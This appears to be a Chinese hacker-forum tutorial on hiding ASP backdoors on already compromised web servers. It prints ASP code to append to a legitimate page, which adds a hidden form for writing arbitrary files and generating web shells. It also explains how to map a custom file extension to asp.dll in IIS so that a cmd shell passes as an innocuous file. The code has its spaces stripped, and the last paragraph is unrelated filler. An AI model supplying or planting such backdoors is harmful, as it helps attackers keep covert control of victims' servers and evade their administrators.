[摘要]传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。一种是a...
传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。
一种是aspInjection(好像这个词真流行呀)。先看第一个图。
这是一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。
再看第二个图,
看一下,用了http://xxx/admin.asp?id=1就多出一个东东来了,第二个图下面这个框,你可以用它来生成网页木马,可以生成asp/php/cgi等网页后门。怎么做到的呢?只要你将这段代码插入某个asp网页代码最下端即可。
<%
onerrorresumenext
id=request("id")
ifrequest("id")=1then
testfile=Request.form("name")
msg=Request.form("message")
setfs=server.CreateObject("scripting.filesystemobject")
setthisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
setfs=nothing
%>
<formmethod="POST"ACTION="你要插入的asp文件名?id=1">
<inputtype="text"size="20"name="Name"
value=<%=server.mappath("xp.asp")%>>
<textareaname="Message"class=input>
</textarea>
<inputtype="submit"name="Send"value="生成"class=input>
</form>
<%endif%>
值得注意的是这段代码要求服务器支持fso,并且不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有<!--#includefile="conn.asp"-->这样的代码,这段代码就不生效了,但不会影响原文件使用。如果你会写asp,你可以将一些asp后门直接写在肉鸡原有的asp文件里。
版主allen写了一个asp文件,一运行会感染所有的asp文件,同目录下每个asp文件都会被插入类似的代码。不知他几时提供下载。:_)
第二,在iis管理器中用asp.dll来解析任意后缀名。像图3,
我把后缀为lcx的文件名用asp.dll来解析。这样,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么?
一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了。
网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。
……